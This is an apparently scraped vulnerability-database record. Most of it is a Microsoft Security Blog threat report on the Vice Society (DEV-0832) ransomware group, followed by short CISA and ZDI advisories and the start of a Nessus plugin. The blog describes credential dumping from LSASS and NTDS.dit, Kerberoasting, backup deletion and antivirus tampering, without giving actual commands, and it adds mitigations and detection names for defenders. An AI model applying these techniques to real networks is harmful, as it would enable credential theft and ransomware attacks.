Before deploying ransomware, DEV-0832 relies on tactics, techniques, and procedures commonly used among other ransomware actors, including the use of PowerShell scripts, repurposed legitimate tools, exploits for publicly disclosed vulnerabilities for initial access and post-compromise elevation of privilege, and commodity backdoors like _SystemBC_.\n\nRansomware has evolved into a complex threat that\u2019s human-operated, adaptive, and focused on a wider scale, using data extortion as a monetization strategy to become even more impactful in recent years. To find easy entry and privilege escalation points in an environment, these attackers often take advantage of poor credential hygiene and legacy configurations or misconfigurations. Defenders can build a robust defense against ransomware by reading our [ransomware as a service blog](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>).\n\nIn this blog, we detail Microsoft\u2019s analysis of observed DEV-0832 activity, including the tactics and techniques used across the group\u2019s campaigns, with the goal of helping customers identify, investigate, and remediate activity in their environments. We provide hunting queries to help customers comprehensively search their environments for relevant indicators as well as protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\n## Who is DEV-0832 (Vice Society)?\n\nMicrosoft has identified multiple campaigns attributed to DEV-0832 over the past year based on the use of a unique PowerShell file name, staging directories, and ransom payloads and their accompanying notes. To gain an initial foothold in compromised networks, DEV-0832 has [reportedly exploited vulnerable web-facing applications and used valid accounts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>). 
However, due to limited initial signals from affected organizations, Microsoft has not confirmed these attack vectors. Attackers then use custom PowerShell scripts, commodity tools, exploits for disclosed vulnerabilities, and native Windows binaries to gather privileged credentials, move laterally, collect and exfiltrate data, and deploy ransomware.\n\nAfter deploying ransomware, DEV-0832 demands a ransom payment, threatening to leak stolen data on the group\u2019s _[.]onion_ site. In some cases, Microsoft observed that DEV-0832 did not deploy ransomware. Instead, the actors appeared to exfiltrate data and dwell within compromised networks. The group sometimes avoids a ransomware payload in favor of simple extortion\u2014threatening to release stolen data unless a payment is made.\n\nThe group also goes to significant measures to ensure that an organization cannot recover from the attack without paying the ransom: Microsoft has observed DEV-0832 access two domain administrator accounts and reset user passwords of over 150,000 users, essentially locking out legitimate users before deploying ransomware to some devices. This effectively interrupts remediation efforts, including attempts to prevent the ransomware payload or post-compromise incident response.\n\n### Toolset\n\n#### Ransomware payloads\n\nMicrosoft has observed DEV-0832 deploy multiple commodity ransomware variants over the past year: BlackCat, QuantumLocker, Zeppelin, and most recently a Vice Society-branded variant of the Zeppelin ransomware. While many ransomware groups have shifted away from branded file extensions in favor of randomly generated ones, DEV-0832 incorporated branding with their Vice Society variant using _.v-s0ciety_ or _.v-society_ file extensions. 
Most recently, in late September 2022, DEV-0832 again modified their ransomware payload to a variant dubbed RedAlert, using a _.locked_ file extension.\n\nIn one July 2022 intrusion, Microsoft security researchers identified DEV-0832 attempting to deploy QuantumLocker binaries and then, within five hours, attempting to deploy suspected Zeppelin ransomware binaries. Such an incident might suggest that DEV-0832 maintains multiple ransomware payloads and switches depending on target defenses or, alternatively, that dispersed operators working under the DEV-0832 umbrella might maintain their own preferred ransomware payloads for distribution. The shift from a [ransomware as a service](<https://aka.ms/ransomware-as-a-service>) (RaaS) offering (BlackCat) to a purchased wholly-owned malware offering (Zeppelin) and a custom Vice Society variant indicates DEV-0832 has active ties in the cybercriminal economy and has been testing ransomware payload efficacy or post-ransomware extortion opportunities.\n\nIn many intrusions, DEV-0832 stages their ransomware payloads in a hidden share on a Windows system, for example accessed via a share name containing \u201c$\u201d. Once DEV-0832 has exfiltrated data, they then distribute the ransomware onto local devices for launching, likely using group policy, as shown in the below command:\n\nFigure 1. Group policy to distribute ransomware onto local devices\n\nThe group also has cross-platform capabilities: Microsoft identified the deployment of a Vice Society Linux Encryptor on a Linux ESXi server.\n\n#### PowerShell scripts\n\nDEV-0832 uses a PowerShell script to conduct a variety of malicious activities and make system-related changes within compromised networks. 
Like their ransomware payloads, DEV-0832 typically stages their PowerShell scripts on a domain controller.\n\nMicrosoft security researchers have observed several variations among identified DEV-0832 PowerShell scripts, indicating ongoing refinement and development over time\u2014while some only perform system discovery commands, other scripts are further modified to perform persistence, defense evasion, data exfiltration, and even distribute the ransomware payloads.\n\n#### Commodity tools\n\nAccording to Microsoft investigations, DEV-0832 has used two commodity backdoors in ransomware attacks: _SystemBC_ and _PortStarter_.\n\n_SystemBC_ is a post-compromise commodity remote access trojan (RAT) and proxy tool that has been incorporated into multiple diverse ransomware attacks. In one DEV-0832 intrusion, the attacker used both a compromised domain admin user account and a compromised contractor account to launch a PowerShell command that launched a _SystemBC_ session under the value name \u201csocks\u201d:\n\nFigure 2. PowerShell command launching a SystemBC session named \u2018socks\u2019\n\n_PortStarter_ is a backdoor written in Go. According to Microsoft analysis, this malware provides functionality such as modifying firewall settings and opening ports to connect to pre-configured command-and-control (C2) servers.\n\nDEV-0832 has also deployed ransomware payloads using the remote launching tool Power Admin. Power Admin is a legitimate tool that provides functionality to monitor servers and applications, as well as file access auditing. 
If an organization has enabled Console Security settings within Power Admin, an attacker must have credentials to make authorized changes.\n\nOther commodity tools identified in DEV-0832 attacks include Advanced Port Scanner and Advanced IP Scanner for network discovery.\n\n#### Abuse of legitimate tooling\n\nLike many other ransomware actors, DEV-0832 relies on misusing legitimate system tools to reduce the need to launch malware or malicious scripts that automated security solutions might detect. Observed tools include:\n\n * Use of the [Windows Management Instrumentation Command-line](<https://learn.microsoft.com/windows/win32/wmisdk/wmic>) (WMIC) to launch commands that delete Mongo databases, other backups, and security programs.\n * Use of Impacket\u2019s WMIexec functionality, an open-source tool to launch commands via WMI, and Impacket _atexec.py_, which launches commands using Task Scheduler.\n * Use of the [vssadmin](<https://learn.microsoft.com/windows-server/administration/windows-commands/vssadmin>) command to delete shadow copy backups on Windows Server.\n * Use of [PsExec](<https://learn.microsoft.com/sysinternals/downloads/psexec>) to remotely launch PowerShell, batch scripts, and deploy ransomware payloads\n\nAdditionally, in one identified intrusion, DEV-0832 attempted to turn off Microsoft Defender Antivirus using registry commands. [Enabling Microsoft Defender Antivirus tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection>) helps block this type of activity.\n\nFigure 3. 
Registry commands that attempt to tamper with Microsoft Defender antivirus software\n\n### Harvesting privileged credentials for ransomware deployment\n\nLike other ransomware groups, after gaining an initial foothold within a network, DEV-0832 moves quickly to gather valid administrator local or domain credentials to ensure they can distribute ransomware payloads throughout the network for maximum impact.\n\n#### Credential dumps\n\nWhile Microsoft has not identified all the credential access techniques of DEV-0832, in many instances DEV-0832 accesses Local Security Authority Server Service (LSASS) dumps to obtain valid account credentials that were present in memory. Microsoft also observed that, instead of using a tool like Mimikatz to access a credential dump, DEV-0832 typically abuses the tool _comsvcs.dll_ along with MiniDump to dump the LSASS process memory. Other ransomware actors have been observed using the same technique.\n\nIn cases where DEV-0832 obtained domain-level administrator accounts, they accessed NTDS dumps for later cracking. The following command shows the attacker exfiltrating the _NTDS.dit_ file, which stores Active Directory data, to an actor-created directory:\n\nFigure 4. Example of attacker command to exfiltrate the \u2018NTDS.dit\u2019 file\n\n#### Kerberoast\n\nMicrosoft has also identified that DEV-0832 used the malicious PowerSploit module [_Invoke-Kerberoast_](<https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/>) to perform a Kerberoast attack, which is a post-exploitation technique used to obtain credentials for a service account from Active Directory Domain Services (AD DS). The _Invoke-Kerberoast_ module requests encrypted service tickets and returns them in an attacker-specified output format compatible with cracking tools. The group can use the cracked Kerberos hashes to reveal passwords for service accounts, often providing access to an account that has the equivalent of domain admin privileges. 
Furthermore, one Kerberos service ticket can have many associated service principal names (SPNs); successful Kerberoasting can then grant an attacker access to the SPNs\u2019 associated service or user accounts, such as obtaining ticket granting service (TGS) tickets for Active Directory SPNs that would allow an attacker to do offline password cracking.\n\nCombined with the fact that service account passwords are not usually set to expire and typically remain unchanged for a great length of time, attackers like DEV-0832 continue to rely on Kerberoasting in compromised networks. Microsoft 365 Defender blocks this attack with Antimalware Scan Interface (AMSI) and machine learning. Monitor for alerts that reference Kerberoast attacks closely as the presence of these alerts typically indicates a human adversary in your environment.\n\n#### Account creation\n\nIn one suspected DEV-0832 intrusion, Microsoft observed an operator create accounts that, based on the naming convention, were designed to blend in as admin accounts and allow persistence without malware, as shown in the following command:\n\nFigure 5. Attacker command to create accounts\n\nMonitoring newly created accounts can help identify this type of suspicious activity that does not rely on launching malware for persistence in the environment.\n\n#### Exploitation of privilege escalation vulnerabilities\n\nIn August 2022, Microsoft security researchers identified one file during a DEV-0832 intrusion indicating that the group has incorporated an exploit for the disclosed, patched security flaw [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) (Windows Common Log File System (CLFS) logical-error vulnerability). Microsoft released a patch in April 2022. 
The DEV-0832 file spawns a new _cmd.exe_ process with system privileges.\n\nAccording to public reporting, DEV-0832 has also incorporated exploits for the [PrintNightmare](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>) vulnerability to escalate privileges in a domain. Combined with the CVE-2022-24521 exploit code, it is likely that DEV-0832, like many other adversaries, quickly incorporates available exploit code for disclosed vulnerabilities into their toolset to target unpatched systems.\n\n#### Lateral movement with valid accounts\n\nAfter gaining credentials, DEV-0832 frequently moves laterally within a network using Remote Desktop Protocol (RDP). And as previously mentioned, DEV-0832 has also used valid credentials to interact with remote network shares over Server Message Block (SMB) where they stage ransomware payloads and PowerShell scripts.\n\n### Data exfiltration\n\nIn one known intrusion, DEV-0832 operators exfiltrated hundreds of gigabytes of data by launching their PowerShell script, which was staged on a network share. The script contained hardcoded attacker-owned IP addresses and searched for wide-ranging, non-targeted keywords ranging from financial documents to medical information, while excluding files containing keywords such as varied antivirus product names or file artifact extensions. Given the wide range of keywords included in the script, it is unlikely that DEV-0832 regularly customizes it for each target.\n\nMicrosoft suspects that DEV-0832 uses legitimate tools Rclone and MegaSync for data exfiltration as well; many ransomware actors leverage these tools, which provide capabilities to upload files to cloud storage. 
DEV-0832 also uses file compression tools to collect data from compromised devices.\n\n## Mitigations\n\nApply these mitigations to reduce the impact of this threat:\n\n * Use [device discovery](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n * Use [Microsoft Defender Vulnerability Management](<https://security.microsoft.com/vulnerabilities>) to assess your current status and deploy any updates that might have been missed.\n * Utilize [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [endpoint detection and response (EDR) in block mode](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. 
EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * [LSA protection](<https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection>) is enabled by default on new Windows 11 devices, hardening the platform against credential dumping techniques. LSA PPL protection will further restrict access to memory dumps making it hard to obtain credentials.\n * Refer to Microsoft\u2019s blog [Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#defending-against-ransomware>) for recommendations on building strong credential hygiene and other robust measures to defend against ransomware.\n\nMicrosoft customers can turn on [attack surface reduction rules](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction>) to prevent several of the infection vectors of this threat. These rules, which can be configured by any administrator, offer significant hardening against ransomware attacks. 
In observed attacks, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * [Block process creations originating from PsExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Use advanced protection against ransomware](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#use-advanced-protection-against-ransomware>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n\n## Detection details\n\n### Microsoft Defender Antivirus\n\n[Microsoft Defender Antivirus](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows?view=o365-worldwide>) detects DEV-0832\u2019s Vice Society-branded Zeppelin variant as the following malware:\n\n * [Ransom:Win32/VSocCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/VSocCrypt.PA!MTB&threatId=-2147138765>)\n * [Trojan:PowerShell/VSocCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/VSocCrypt.PA!MTB&threatId=-2147136227>)\n * 
[Ransom:Linux/ViceSociety](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Linux/ViceSociety.D!MTB&threatId=-2147136262>)\n\nOther commodity ransomware variants previously leveraged by DEV-0832 are detected as:\n\n * [Behavior:Win32/Ransomware!Quantum.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Ransomware!Quantum.A&threatId=-2147147947>)\n * [Behavior:Win32/Quantum.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Quantum.AA&threatId=-2147147852>)\n * [Ransom:Win32/Zeppelin](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Zeppelin&threatId=-2147188430>)\n * [Ransom:Win32/Blackcat](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Blackcat&threatId=-2147158032>)\n\n_SystemBC_ and _PortStarter_ are detected as:\n\n * [Behavior:Win32/SystemBC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/SystemBC.A!nri&threatId=-2147149800>)\n * [Trojan:Win32/SystemBC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/SystemBC.SA!sms&threatId=-2147150468>)\n * [Backdoor:Win64/PortStarter](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win64/PortStarter&threatId=-2147137231>)\n\nSome pre-ransomware intrusion activity used in multiple campaigns by various activity groups can be detected generically. 
During identified DEV-0832 activity, associated command line activity was detected with generic detections, including:\n\n * Behavior:Win32/OfficeInjectingProc.A\n * Behavior:Win32/PsexecRemote.E\n * Behavior:Win32/SuspRemoteCopy.B\n * Behavior:Win32/PSCodeInjector.A\n * Behavior:Win32/REnamedPowerShell.A\n\n### Microsoft Defender for Endpoint\n\nThe following [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) alerts can indicate threat activity on your network:\n\n * DEV-0832 activity group\n * 'VSocCrypt' ransomware was prevented\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.\n\n * Use of living-off-the-land binary to run malicious code\n * Potential SystemBC execution via Windows Task Scheduler\n * Suspicious sequence of exploration activities\n * Process memory dump\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote activity\n * Suspicious access to LSASS service\n * Suspicious credential dump from NTDS.dit\n * File backups were deleted\n * System recovery setting tampering\n\nThe post [DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector](<https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-10-25T16:00:00", "type": "mmpc", "title": "DEV-0832 (Vice Society) opportunistic ransomware campaigns impacting US education sector", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-10-25T16:00:00", "id": "MMPC:123BB884C96F0D2CEEB22B6F3B90BCB4", "href": "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-04-20T11:28:33", "description": "Microsoft has released [an advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809>) to address CVE-2022-26809, a critical remote code execution vulnerability in Remote Procedure Call Runtime Library. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. 
\n\nCISA encourages users and administrators to review [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809>) and apply the recommended mitigations.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/04/13/microsoft-releases-advisory-address-critical-remote-code-execution>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:00", "type": "cisa", "title": "Microsoft Releases Advisory to Address Critical Remote Code Execution Vulnerability (CVE-2022-26809) ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26809"], "modified": "2022-04-13T00:00:00", "id": "CISA:A4C48C3DF384DD6E6CE086DAF7BAE679", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2022/04/13/microsoft-releases-advisory-address-critical-remote-code-execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2023-05-23T15:49:08", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the User Profile Service. By creating a directory junction, an attacker can abuse the service to delete a directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "zdi", "title": "Microsoft Windows User Profile Service Directory Junction Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-11T00:00:00", "id": "ZDI-21-966", "href": 
"https://www.zerodayinitiative.com/advisories/ZDI-21-966/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T14:44:40", "description": "The remote Windows host is missing security update 5012639 or cumulative update 5012670. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24547, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26790, CVE-2022-26792, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24491, CVE-2022-24492, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24536, CVE-2022-24541, CVE-2022-26809, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26829, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24483, CVE-2022-24493, CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. 
(CVE-2022-24484, CVE-2022-24538, CVE-2022-26784, CVE-2022-26831, CVE-2022-26915)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012670: Windows Server 2012 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26784", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012639.NASL", "href": "https://www.tenable.com/plugins/nessus/159682", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159682);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n 
\"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24550\",\n \"CVE-2022-26784\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012639\");\n script_xref(name:\"MSKB\", value:\"5012670\");\n script_xref(name:\"MSFT\", value:\"MS22-5012639\");\n script_xref(name:\"MSFT\", value:\"MS22-5012670\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012670: Windows Server 2012 R2 Security Update (April 2022)\");\n\n 
